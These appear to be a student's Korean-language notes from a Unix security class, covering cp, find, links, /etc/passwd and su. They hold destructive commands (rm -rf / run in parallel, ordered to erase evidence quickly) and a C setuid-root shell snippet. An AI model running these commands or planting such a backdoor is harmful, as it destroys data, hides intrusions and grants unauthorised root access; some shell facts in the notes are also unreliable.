find로 찾는 것이 정확
find -type l
cd /; ls -aslR > /tmp/today.txt
cd /; ls -aslR > /tmp/tommorow.txt
diff today.txt tomorrow.txt
cp
a옵션: 파일 속성 유지
R옵션: 소유주도 바뀌게 된다
p옵션: 파일 생성시간, 변조시간
cp /bin/login /bin/login.org
-> cp /bin/login.org /bin/login
presercing copy를 사용하자! 원본그대로 옮겨 둘 수 있다
cp -p
rm alias 고려-> rm -i
전체 파일 시스템 지우는 명령어는 어떤게 좋을지
fedora리눅스!
nohup sudo rm -rf /&
작업 속도가 느려서 걸린다
파일시스템 통으로 날리는 명령어 있다
man -k remove
man delete
man file
man -k erase
man -k file
rm -rf /var &; rm -rf /etc &; rm -rf / &;
var 디렉토리에 증거가 남는다
rm -rf /&; rm -rf /&; rm -rf /&
같은 작업을 여러번 한다!
rm -rf /bin ^; rm -rf /etc &; rm -rf /var&
rm이 날라가서 문제가 된다
bin 디렉토리 먼저 날라가면 안되고
/usr/lib가 날라가면 안된다!(동적라이브러리가 없어져서) 나중에 날려야 한다
목적: 증거가 안남기기 위해 최대한 빠른 시간 내에 지우고 모든 파일 지우기
새로운 명령어 찾아내기
이런식으로 몇 초 이런 식으로 몇 초
어느 디렉토리부터 지우고 어느 명령어부터 쓰고
4월 말까지
ln
symbolic link와 hard link가 뭐가 다른지!
stty insane
/private/var/log
tail -f wifi.log 계속 열어놓음
strings -n
string /usr/sbin/* > /tmp/strings_today.txt
permission!!!!!!!!!
softlink hardlink
hardlink는 original directory entry와 구분이 가지 않는다.
file type
stat 파일 정보를 알 수 있다
wc word count
more /etc/passwd
계정이름 비밀번호( x),
비밀번호가 *이면 계정잠그기
shutdown: x:0:0:shutdown purpose:/:/usr/sbin/halt
fping !!
man fping 페이지가 없다
/bin/fping
리눅스에서는 kshell ksh
솔라리스에서는 zshell zsh
os마다 사용하는 쉘이 다르다]
su
su-
의 차이점
su 암호 euid가 루트인 상태인데도 물어본다
var/log/su밑에 기록이 남긴다
cenda-cenda 자기에서 자기로 su 정말 이상해!ㅡㅡ
#include <stdio.h>
#include<stdlib.h>
main(){
setuid(0);
system("/usr/bin/zsh");
}
이러면 user가 루트가 된다!